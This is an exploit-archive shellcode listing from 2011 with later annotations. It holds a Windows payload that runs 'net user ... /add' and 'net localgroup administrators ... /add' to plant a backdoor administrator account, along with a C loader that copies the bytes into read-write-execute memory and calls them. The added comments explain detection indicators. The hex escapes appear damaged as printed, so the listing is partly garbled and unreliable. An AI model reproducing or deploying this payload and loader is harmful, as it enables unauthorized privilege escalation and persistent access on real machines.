
# Title : Allwin WinExec add new local administrator + ExitProcess Shellcode
# Published : 2011-05-25
# Author :


/*
Title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 279 bytes
Date: 2011-05-25
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
 -- command: cmd.exe /c net user RubberDuck mudbath /add && net localgroup administrators RubberDuck /add
 -- Username: RubberDuck
 -- Password: mudbath
*/

#include <stdio.h>
#include <windows.h>
 
int main(){
  /*
   * Stand-alone loader for the payload described in the header comment:
   * copy the byte string into a freshly committed RWX page and jump to it.
   * From a defensive standpoint this is the textbook
   * "VirtualAlloc(PAGE_EXECUTE_READWRITE) + memcpy + indirect call"
   * sequence that memory scanners and EDR user-mode hooks key on; the
   * private executable region it leaves behind, not backed by any module
   * on disk, is itself a memory-forensics indicator.
   *
   * NOTE(review): the listing looks extraction-damaged -- every "\x" hex
   * escape appears as a bare "x" (e.g. xFC) and every "\n" as a bare "n",
   * so as printed the literal holds ASCII text rather than the 279 bytes
   * the title claims.
   */
  unsigned char shellcode[]=
    /* Position-independent stub.  The 4-byte compare constants near the
       start spell "GetP" "rocA" "ddre" (0x47 0x65 0x74 0x50, ...), so the
       stub presumably resolves GetProcAddress from an export table, then
       pushes the name fragments "xec"/"WinE" and "ess"/"Proc"/"Exit"
       (i.e. WinExec and ExitProcess) ahead of the FF D2 / FF D0 indirect
       calls.  Exact mechanics not verified here. */
    "xFCx33xD2xB2x30x64xFFx32x5Ax8B"
    "x52x0Cx8Bx52x14x8Bx72x28x33xC9"
    "xB1x18x33xFFx33xC0xACx3Cx61x7C"
    "x02x2Cx20xC1xCFx0Dx03xF8xE2xF0"
    "x81xFFx5BxBCx4Ax6Ax8Bx5Ax10x8B"
    "x12x75xDAx8Bx53x3Cx03xD3xFFx72"
    "x34x8Bx52x78x03xD3x8Bx72x20x03"
    "xF3x33xC9x41xADx03xC3x81x38x47"
    "x65x74x50x75xF4x81x78x04x72x6F"
    "x63x41x75xEBx81x78x08x64x64x72"
    "x65x75xE2x49x8Bx72x24x03xF3x66"
    "x8Bx0Cx4Ex8Bx72x1Cx03xF3x8Bx14"
    "x8Ex03xD3x52x68x78x65x63x01xFE"
    "x4Cx24x03x68x57x69x6Ex45x54x53"
    "xFFxD2x6Ax05xEBx23xFFxD0x68x65"
    "x73x73x01x8BxDFxFEx4Cx24x03x68"
    "x50x72x6Fx63x68x45x78x69x74x54"
    "xFFx74x24x1CxFFx54x24x1Cx57xFF"
    /* From the 0x63 0x6D 0x64 0x2E ("cmd.") bytes on the next line
       onward the payload is plain ASCII: the NUL-terminated
       "cmd.exe /c net user RubberDuck mudbath /add && net localgroup
       administrators RubberDuck /add" command line quoted in the header.
       That cleartext is what string-scanning detections will see. */
    "xD0xE8xD8xFFxFFxFFx63x6Dx64x2E"
    "x65x78x65x20x2Fx63x20x6Ex65x74"
    "x20x75x73x65x72x20x52x75x62x62"
    "x65x72x44x75x63x6Bx20x6Dx75x64"
    "x62x61x74x68x20x2Fx61x64x64x20"
    "x26x26x20x6Ex65x74x20x6Cx6Fx63"
    "x61x6Cx67x72x6Fx75x70x20x61x64"
    "x6Dx69x6Ex69x73x74x72x61x74x6F"
    "x72x73x20x52x75x62x62x65x72x44"
    "x75x63x6Bx20x2Fx61x64x64x00";
  LPVOID lpAlloc;      /* base of the RWX page; NULL if VirtualAlloc fails */
  void (*pfunc)();     /* payload entry point, invoked with no arguments */
 
  /* lstrlen stops at the first 0x00, which in this buffer is the final
     byte (27 lines of 10 plus 9 = 279 including that NUL), so the +1
     reports the whole payload.  lstrlen takes LPCSTR; passing an
     unsigned char array relies on the compiler tolerating the signedness
     mismatch. */
  printf("size = %i bytesn", lstrlen(shellcode) + 1);
  printf("-------------------------nUsername: RubberDucknPassword: mudbathn");
  system("PAUSE");   /* cmd.exe builtin: block until a key is pressed */
 
  /* One committed page that is writable AND executable at the same time:
     no W^X split, no later VirtualProtect.  Allocation of RWX memory by a
     process that then transfers control into it is a common detection
     rule in its own right. */
  lpAlloc = VirtualAlloc(0, 4096,
                         MEM_COMMIT,
                         PAGE_EXECUTE_READWRITE);
 
  if(lpAlloc == NULL){
    printf("Memory not allocated!n");
    return 0;   /* note: exit status is still 0 on this failure path */
  }
 
  /* Copies the payload plus its terminating NUL.  memcpy needs <string.h>,
     which is not included explicitly here -- presumably pulled in through
     windows.h on the original toolchain. */
  memcpy(lpAlloc, shellcode, lstrlen(shellcode) + 1);
 
  /* Implicit void* -> function-pointer conversion: C compilers accept it
     with at most a warning; C++ would reject it outright. */
  pfunc = lpAlloc;
 
  /* Control transfers into the heap page.  If the payload really ends in
     ExitProcess as the title states, the return below is never reached. */
  pfunc();
 
  return 0;
}